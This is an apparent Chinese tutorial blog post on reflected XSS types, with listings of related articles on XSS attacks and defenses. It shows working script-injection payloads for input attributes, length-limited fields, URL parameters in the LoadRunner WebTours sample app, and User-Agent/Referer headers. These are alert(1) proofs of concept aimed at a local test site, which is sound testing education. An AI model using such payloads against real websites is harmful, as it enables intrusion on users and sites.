反射型跨站脚本漏洞的几种类型

最新推荐文章于 2024-06-20 02:49:18 发布
最新推荐文章于 2024-06-20 02:49:18 发布
阅读量3.6k 收藏 2
点赞数
分类专栏: 网站管理

1.页面输入

 *基于html标签,如

<input name="search" value="" type=text >

先用”>先闭合之前的属性,之后再重新定义一个新标签,

“><script>alert(1)</script><a=“,输入之后,页面的html变为

<input name="search" value=""><Script>alert(1)</script><a="" type=text >,将弹出警告框

*长度限制
有时页面输入框有长度限制,可以将脚本分割输入
<input id=uid value=“” type=text size=10 maxlength=15>
<input id=pas value=“” type=text size=10 maxlength=15>
<script>
Document.write(document.getElementbyid(“uid”)+document.getElementbyid(“pas”))
<script>

两个输入框分别输入以下代码,
<script>alert(
1)</script>
输出到页面时,同样可以弹出

如果第二个输入框没有长度限制,还可以使用注释,将中间的html全部注释掉

<!--
--><script>alert(1)</script>

2.url参数

Xss攻击不限于页面输入,可能还存在GET请求的url参数之中,有的参数不会在页面显示,比如隐藏表单域(input=hidden),或者页面输入元素师禁用或不可输入,比如下拉框,需要借助工具实现,可以使用firefox的firebug修改其字段值,还可以使用代理拦击服务器拦截请求,修改字段值

如:LR之前版本的示例程序(webtours)订票操作,传值时,arrive字段在页面上是下拉框,无法进行手工输入,但拦截请求后可以修改其值
GET /webtours/reservations.pl?Arrive=frankfurt<Script>alert(1)</script>&departdate=07%2f15%2f2014……

如果是post请求,使用Burp可以转换为get请求

3.http请求中的跨站脚本漏洞

Webtours网站存在此类型的漏洞,
http://localhost:1080/testssi.ssi

页面源码:

You are using:<!--#echo var=”HTTP_USER_AGENT”--><BR>
You are from:<!--#echo var=”HTTP_REFERER”-->
该页面获取请求头中的useragent和referer值显示在页面,没有进行输入验证,因此当在该两个字段输入脚本<script>alert(1)</script>时,将会弹出警告框。

 

波特王子
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss反射post_XSS 跨站脚本攻击漏洞详解(反射xss+储存xss)
weixin_42349126的博客
01-31 2169
XSS(Cross Site Scripting)简介:XSS 跨站脚本攻击(Cross Site Scripting),为了跟HTML里面的层叠样式表(CSS ,Cascading Style Sheets)作区分作用叫XSS.反射XSS的入侵过程:攻击者将含有恶意JavaScript代码的URL发给用户==>用户打开URL==>web应用程序对攻击者的JavaScript做出回应...
SQL注入技术和跨站脚本攻击的检测
12-14
针对跨站脚本攻击,可以采取以下几种方法进行防御: 1. **内容安全策略 (CSP)**:通过设置Content-Security-Policy头部来限制浏览器加载和执行脚本的来源。 2. **HTTPOnly Cookies**:设置Cookies为HttpOnly属性,...
Web漏洞-XSS跨站漏洞之原理分类及攻击手法
ran的博客
03-13 731
前端提交的一些参数转换为js代码,可以回显一些想要的东西;其产生层面是在前端;常见的一些输出性的函数与此漏洞有关;漏洞的危害收到js代码的影响,同时也收到浏览器内核的影响。实例解释:首先写一个简单的验证代码。输入js代码,网页成功执行。不同的浏览器内核对XSS漏洞的影响。反射:发包x=didi===>x.php===>回包存储:发包x=didi===>x.php===>写到数据库某个表中===>x.php回包dom:发包x=didi===>本地浏览器静态前端代码===>x.php。
XSS跨站脚本攻击_反射跨站脚本攻击需要过滤的字符
最新发布
2301_76224593的博客
06-20 977
跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢?XSS是指恶意攻击者利用网没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号。
Java SSM框架+jsp处理存储XSS和反射XSS漏洞
weixin_45767372的博客
07-07 4385
存储XSS和反射XSS修复
XSS跨站脚本漏洞
weixin_53279333的博客
08-23 358
原理 :指攻击者利用网程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响 的 HTML 代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。通过在用户端注入恶意的可执行脚本,若服务器对用户的输入不进行 处理或处理不严,则浏览器就会直接执行用户注入的脚本
关于 XSS(跨站脚本漏洞
辉小鱼的博客
09-05 1443
XSS攻击全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。
【Web漏洞探索】跨站脚本漏洞
kjcxmx的博客
08-03 3978
跨站脚本(Cross-site scripting简称为"CSS",为避免与前端叠成样式表的缩写"CSS"冲突,故称为XSS)允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过同源策略,该策略旨在将不同的网相互隔离。跨站脚本漏洞通常允许攻击者伪装成受害者用户,执行用户能够执行的任何操作,并访问用户的任何数据。如果受害者用户在应用程序中具有特权访问权限,那么攻击者可能能够完全控制应用程序的所有功能和数据。XSS跨站脚本是一种网应用程序的安全漏洞攻击,是代码注入的一种。...
web安全技术-实验七、跨站脚本攻击(xss)(反射).doc
08-20
跨站脚本攻击(XSS)概述】 XSS,全称Cross Site Scripting,是一种常见的Web应用程序安全漏洞,攻击者利用此漏洞向网页中注入恶意脚本,当其他用户浏览该页面时,这些脚本会被执行,从而可能窃取用户的敏感信息...
如何进行跨站脚本攻击--原理、检测与防御
07-06
跨站脚本攻击(Cross-Site Scripting,简称XSS)是Web应用中最常见的安全漏洞之一。XSS攻击允许攻击者在用户的浏览器中注入恶意脚本代码,这些代码会在用户浏览网页时被执行。XSS攻击可以分为三类:存储XSS、反射...
跨站脚本,参考学习
04-28
- **反射XSS**:这种类型的XSS攻击发生在用户访问一个包含恶意脚本的URL时,恶意脚本作为查询字符串的一部分被发送给Web应用,然后由Web应用反射回用户的浏览器执行。 - **DOMXSS**:这种类型的XSS利用了DOM...
url存在宽字节跨站漏洞_漏洞那些事er 反射跨站脚本攻击
weixin_39640543的博客
12-10 603
跨站脚本攻击(Cross Site Scripting,缩写为XSS)本质上仍是注入攻击的一种。当实施此类攻击时,攻击者通过直接或间接的方式,向WEB应用提交包含恶意代码数据,而WEB应用未对提交数据进行合法性验证或转义处理,最终致使恶意代码在被攻击者的浏览器中执行。 跨站脚本是所有WEB应用安全漏洞中最常见的一种,一些安全公司的统计数据显示,其数量占据了WE...
页面文本框写js脚本怎么验证是否有效_XSS 跨站脚本攻击漏洞详解(反射xss+储存xss)...
weixin_39691233的博客
11-24 983
XSS(Cross Site Scripting)简介:XSS 跨站脚本攻击(Cross Site Scripting),为了跟HTML里面的层叠样式表(CSS ,Cascading Style Sheets)作区分作用叫XSS.反射XSS的入侵过程:攻击者将含有恶意JavaScript代码的URL发给用户==>用户打开URL==>web应用程序对攻击者的JavaScript做出回应...
跨站脚本攻击(XSS)分类介绍及解决办法
热门推荐
半夏_2021的博客
04-26 2万+
Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全。
跨站脚本攻击漏洞(XSS):基础知识和防御策略
weixin_43263566的博客
01-16 9806
跨站脚本攻击漏洞-基础篇
跨站脚本(XSS)漏洞
梁辰兴的博客
06-07 4906
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储XSS; 3.DOMXSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取。甚至可以结合浏览器自身漏洞对用户主机进行远程控制等。形
渗透测试技术----常见web漏洞--跨站脚本攻击原理及防御
wwl012345的博客
08-16 3171
一、跨站脚本攻击介绍 1.跨站脚本攻击简介 跨站脚本攻击(Cross-Site Scripting)简称为XSS(本来为CSS,但是与前端语言CSS容易产生歧义,故取名为XSS),XSS是一种针对于网应用程序(Web客户端)的安全漏洞攻击技术,是代码注入的一种,它允许攻击者将恶意JS代码注入到网页,这样其他用户在访问网页时就会受到影响。攻击者利用XSS代码攻击成功后,可能得到一些高权限来执行一...
反射XSS跨站脚本攻击和防御
认知 行动 坚持
07-05 6107
在前面的文章中,讲述了最好懂的存储XSS攻击和防御,本文来聊聊反射XSS,所谓反射,就像镜子一样,一束光发过去,立即弹回来。这里依赖于微博服务器存在反射XSS漏洞。那么,坏人C为什么不自己搭建一个反射服务器进行反射呢? 这是个好问题。以js获取cookie为例,如果坏人C自己搭建反射服务器,那么很显然document.cookie就无法获取好人A的微博cookie,所以,还是要用微博服务器做反射,这样才能获取好人A的微博cookie,从而进行攻击。
xss 跨站脚本攻击漏洞
08-29
跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的网络安全漏洞,攻击者利用这个漏洞向网中注入恶意代码,并在用户浏览器上执行。这种攻击通常发生在存在输入输出的网页应用程序中。 XSS攻击主要分为三种类型: 1. 存储XSS:攻击者将恶意代码存储在目标网的数据库中,当其他用户访问该网时,恶意代码被返回并在用户浏览器中执行。 2. 反射XSS:攻击者构造一个包含恶意代码的URL,并将其发送给目标用户。用户点击链接后,恶意代码从URL中获取并在用户浏览器上执行。 3. DOM-based XSS:攻击者通过修改网页的DOM结构来执行恶意代码,不需要向服务器发送请求。这种类型的XSS攻击主要基于客户端脚本和DOM文档对象模。 为了防止XSS攻击,开发人员可以采取以下几种措施: 1. 输入验证和过滤:对用户输入的数据进行验证和过滤,确保不允许包含恶意代码。 2. 输出编码:在将数据输出到网页上时,使用适当的编码方式(如HTML实体编码或JavaScript转义)来防止恶意代码的执行。 3. 使用安全的API:避免使用不安全的API,特别是将用户输入作为参数的API。例如,使用textContent替代innerHTML可以防止XSS攻击。 4. 设置HTTP头部:通过设置X-XSS-Protection和Content-Security-Policy头部,可以进一步加强网的安全性。 请注意,这只是一些常见的防御措施,具体的应对措施还需要根据实际情况和开发框架来确定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值